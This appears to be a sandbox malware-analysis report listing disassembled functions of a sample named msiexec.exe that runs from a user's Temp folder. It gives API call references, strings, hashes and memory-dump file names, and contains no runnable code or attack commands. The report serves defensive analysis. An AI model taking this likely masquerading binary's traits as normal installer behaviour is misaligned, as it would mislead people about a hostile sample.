API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
Instruction ID: ecf959edf644124ae9a18d4fa2a520563b4821934e06b5e1f2851b0e4fc8d151
Opcode Fuzzy Hash: 502b3e781240547b4f79c84f5df072659d73b9fdff3a6a82af1c7000a0e1b831
Instruction Fuzzy Hash: FBA14870900208BFEB219FA1DD89AAE7F79FB08355F40407AFA05AA2A0C7755E41DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004038EB Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403927
ShowWindow.USER32(?), ref: 00403944
DestroyWindow.USER32 ref: 00403958
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403974
GetDlgItem.USER32(?,?), ref: 00403995
SendMessageA.USER32 ref: 004039A9
IsWindowEnabled.USER32(00000000), ref: 004039B0
GetDlgItem.USER32(?,00000001), ref: 00403A5E
GetDlgItem.USER32(?,00000002), ref: 00403A68
SetClassLongA.USER32(?,000000F2,?), ref: 00403A82
SendMessageA.USER32 ref: 00403AD3
GetDlgItem.USER32(?,00000003), ref: 00403B79
ShowWindow.USER32(00000000,?), ref: 00403B9A
EnableWindow.USER32(?,?), ref: 00403BAC
EnableWindow.USER32(?,?), ref: 00403BC7
GetSystemMenu.USER32 ref: 00403BDD
EnableMenuItem.USER32 ref: 00403BE4
SendMessageA.USER32 ref: 00403BFC
SendMessageA.USER32 ref: 00403C0F
lstrlenA.KERNEL32(00429FE0,?,00429FE0,0042E360), ref: 00403C38
SetWindowTextA.USER32(?,00429FE0), ref: 00403C47
ShowWindow.USER32(?,0000000A), ref: 00403D7B

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
Instruction ID: 552f9e5d3371f53337095c5be2d86efa37a563823f2766eb5c4291c6ef6876bd
Opcode Fuzzy Hash: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
Instruction Fuzzy Hash: B8C1B171604204AFD721AF62ED85E2B7F6CEB44706F40053EF941B51E1C779A942DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403555 Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

lstrcatA.KERNEL32(1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035C6
lstrlenA.KERNEL32(hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" ), ref: 0040363B
lstrcmpiA.KERNEL32(?,.exe,hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000), ref: 0040364E
GetFileAttributesA.KERNEL32(hjgjhad), ref: 00403659
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 004036A2

Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977

RegisterClassA.USER32 ref: 004036E9
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403701
CreateWindowExA.USER32 ref: 0040373A
ShowWindow.USER32(00000005,00000000), ref: 00403770
LoadLibraryA.KERNEL32(RichEd20), ref: 00403781
LoadLibraryA.KERNEL32(RichEd32), ref: 0040378C
GetClassInfoA.USER32(00000000,RichEdit20A,0042E300), ref: 0040379C
GetClassInfoA.USER32(00000000,RichEdit,0042E300), ref: 004037A9
RegisterClassA.USER32(0042E300), ref: 004037B2
DialogBoxParamA.USER32 ref: 004037D1

Strings

RichEdit20A, xrefs: 00403794, 0040379A
.DEFAULT\Control Panel\International, xrefs: 004035B1
RichEd32, xrefs: 00403787
RichEd20, xrefs: 0040377C
C:\Users\user\AppData\Local\Temp\, xrefs: 00403559
_Nb, xrefs: 004036F8, 004036FD
1033, xrefs: 00403575, 004035C1
Control Panel\Desktop\ResourceLocale, xrefs: 00403589
"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 00403561
hjgjhad, xrefs: 00403609, 00403611, 0040361E, 00403668, 0040366E
.exe, xrefs: 00403648
RichEdit, xrefs: 004037A3

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hjgjhad
API String ID: 914957316-3096183934
Opcode ID: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
Instruction ID: af9374935d7a54fd1dce6881c110e57d7cc589bc1fe1380e1b33b637fa7f222c
Opcode Fuzzy Hash: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
Instruction Fuzzy Hash: E161C571604204BAD220AF669D85F273EACE744759F40447FF941B22E1D779AD028B3E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F06 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F91
GetDlgItem.USER32(00000000,000003E8), ref: 00403FA5
SendMessageA.USER32 ref: 00403FC3
GetSysColor.USER32 ref: 00403FD4
SendMessageA.USER32 ref: 00403FE3
SendMessageA.USER32 ref: 00403FF2
lstrlenA.KERNEL32(?), ref: 00403FFC
SendMessageA.USER32 ref: 0040400A
SendMessageA.USER32 ref: 00404019
GetDlgItem.USER32(?,0000040A), ref: 0040407C
SendMessageA.USER32 ref: 0040407F
GetDlgItem.USER32(?,000003E8), ref: 004040AA
SendMessageA.USER32 ref: 004040EA
LoadCursorA.USER32 ref: 004040F9
SetCursor.USER32(00000000), ref: 00404102
ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404115
LoadCursorA.USER32 ref: 00404122
SetCursor.USER32(00000000), ref: 00404125
SendMessageA.USER32 ref: 00404151
SendMessageA.USER32 ref: 00404165

Strings

N, xrefs: 00404098
hjgjhad, xrefs: 004040D5
open, xrefs: 0040410D

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$hjgjhad$open
API String ID: 3615053054-1121083075
Opcode ID: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
Instruction ID: 0605a8af88f24b8a239437e517aaa265f180be2417519ff34b25117700073a86
Opcode Fuzzy Hash: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
Instruction Fuzzy Hash: D161C1B1A40209BBEB109F60DD45F6A3B69FF54715F108036FB01BA2D1C7B8A991CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,0042E360,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040575A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

CloseHandle.KERNEL32(00000000), ref: 004057A7
GetShortPathNameA.KERNEL32 ref: 004057B0
GetShortPathNameA.KERNEL32 ref: 004057CD
wsprintfA.USER32 ref: 004057EB
GetFileSize.KERNEL32(00000000,00000000,0042BBE8,C0000000,00000004,0042BBE8,?,?,?,00000000,000000F1,?), ref: 00405826
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405835
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040584B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405891
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004058A3
GlobalFree.KERNEL32(00000000), ref: 004058AA
CloseHandle.KERNEL32(00000000), ref: 004058B1

Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F

Strings

%s=%s, xrefs: 004057E1
[Rename], xrefs: 0040585B, 0040586D

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
Instruction ID: 426fb2abaf3c2c6495405564ff4e517f65c757b77f6bed08917e1be6c8ffeb7f
Opcode Fuzzy Hash: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
Instruction Fuzzy Hash: 6341FF32606B15ABE3206B619C49F6B3A5CDF80705F004436FD05F62C2E678E8118EBD

Uniqueness

Uniqueness Score: -1.00%

Function 004041FC Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 266stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404248
SetWindowTextA.USER32(?,?), ref: 00404275
SHBrowseForFolderA.SHELL32(?,004293B0,?), ref: 0040432A
CoTaskMemFree.OLE32(00000000), ref: 00404335
lstrcmpiA.KERNEL32(hjgjhad,00429FE0,00000000,?,?), ref: 00404367
lstrcatA.KERNEL32(?,hjgjhad), ref: 00404373
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404383

Part of subcall function 004052B1: GetDlgItemTextA.USER32 ref: 004052C4

Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CC6
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD3
Part of subcall function 00405C6E: CharNextA.USER32(?), ref: 00405CD8
Part of subcall function 00405C6E: CharPrevA.USER32(?,?), ref: 00405CE8

GetDiskFreeSpaceA.KERNEL32(00428FA8,?,?,0000040F,?,00428FA8,00428FA8,?,00000000,00428FA8,?,?,000003FB,?), ref: 0040443C
MulDiv.KERNEL32 ref: 00404457
SetDlgItemTextA.USER32(00000000,00000400,00428F98), ref: 004044D0

Strings

hjgjhad, xrefs: 00404361, 00404366, 00404371
A, xrefs: 00404323

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$hjgjhad
API String ID: 2246997448-1285462269
Opcode ID: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
Instruction ID: 52dfe11e264a0fce323933678d720eed1997f61c196974170264a293bd140da1
Opcode Fuzzy Hash: 6ab1eb65d489d7f474ee6da6f1ce318879e7bc5207f6923fd53d8865a327c9bb
Instruction Fuzzy Hash: 19915FB1A00219ABDF11AFA1CC85AAF7BB8EF84315F10407BFA00B6291D77C99418F59

Uniqueness

Uniqueness Score: -1.00%

Function 00405A2E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405AD6
GetSystemDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B51
GetWindowsDirectoryA.KERNEL32(hjgjhad,00000400), ref: 00405B64
SHGetSpecialFolderLocation.SHELL32(?,0041D988), ref: 00405BA0
SHGetPathFromIDListA.SHELL32(0041D988,hjgjhad), ref: 00405BAE
CoTaskMemFree.OLE32(0041D988), ref: 00405BB9
lstrcatA.KERNEL32(hjgjhad,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BDB
lstrlenA.KERNEL32(hjgjhad,?,004297B8,00000000,00404DE2,004297B8,00000000), ref: 00405C2D

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405BD5
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B20
hjgjhad, xrefs: 00405A57, 00405B1E, 00405B3B, 00405B50, 00405B63, 00405B7F, 00405BAA, 00405BDA, 00405BE0, 00405BF8, 00405C0B, 00405C26, 00405C2C, 00405C37, 00405C61

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$hjgjhad
API String ID: 900638850-281039111
Opcode ID: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
Instruction ID: e3937826694aa96a66c9679703be47664347117baa65301e61951ea2719d1281
Opcode Fuzzy Hash: 836fece74e7b83efcc8e6abf991d18e4324180e390ed0b8ba3fefc28c16e2b61
Instruction Fuzzy Hash: DB51F331A04B05AAEF219B689C84BBF3BB4DB15314F54423BE912B62D0D27C6D42DF4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?), ref: 00405CC6
CharNextA.USER32(?), ref: 00405CD3
CharNextA.USER32(?), ref: 00405CD8
CharPrevA.USER32(?,?), ref: 00405CE8

Strings

*?|<>/":, xrefs: 00405CB6
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C6F, 00405CAA
"C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" , xrefs: 00405C74

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2275829841
Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction ID: 3b67653c5ee308ebbdbeafcda2e7905df7fa5ba98b11233f7c0ae47683edab57
Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction Fuzzy Hash: 0811905180CB912EFB3206245D44BB7BF89CB567A0F58447BE9C5B22C2CA7C5C429A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E25 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403E42
GetSysColor.USER32 ref: 00403E5E
SetTextColor.GDI32(?,00000000), ref: 00403E6A
SetBkMode.GDI32(?,?), ref: 00403E76
GetSysColor.USER32 ref: 00403E89
SetBkColor.GDI32(?,?), ref: 00403E99
DeleteObject.GDI32(?), ref: 00403EB3
CreateBrushIndirect.GDI32(?), ref: 00403EBD

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_msiexec.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: df06335cf3b4afc37a3544ae2d30c5d34a8579c70edf0d6bae8496df32602c64
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: DC219671904709ABCB219F78DD08B4B7FF8AF00715F048A29F855E22E0D338E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040267C Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
GlobalFree.KERNEL32(?), ref: 00402725
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402737
GlobalFree.KERNEL32(00000000), ref: 0040273E
CloseHandle.KERNEL32(FFFFFD66), ref: 00402756
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A

Memory Dump Source

Source File: 00000005.00000002.353286798.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.353284282.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353289354.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000414000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000420000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353292307.0000000000434000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000005.00000002.353307617.0000000000437000.00000002.00000001.01000000.0000000A.sdmpDownload File

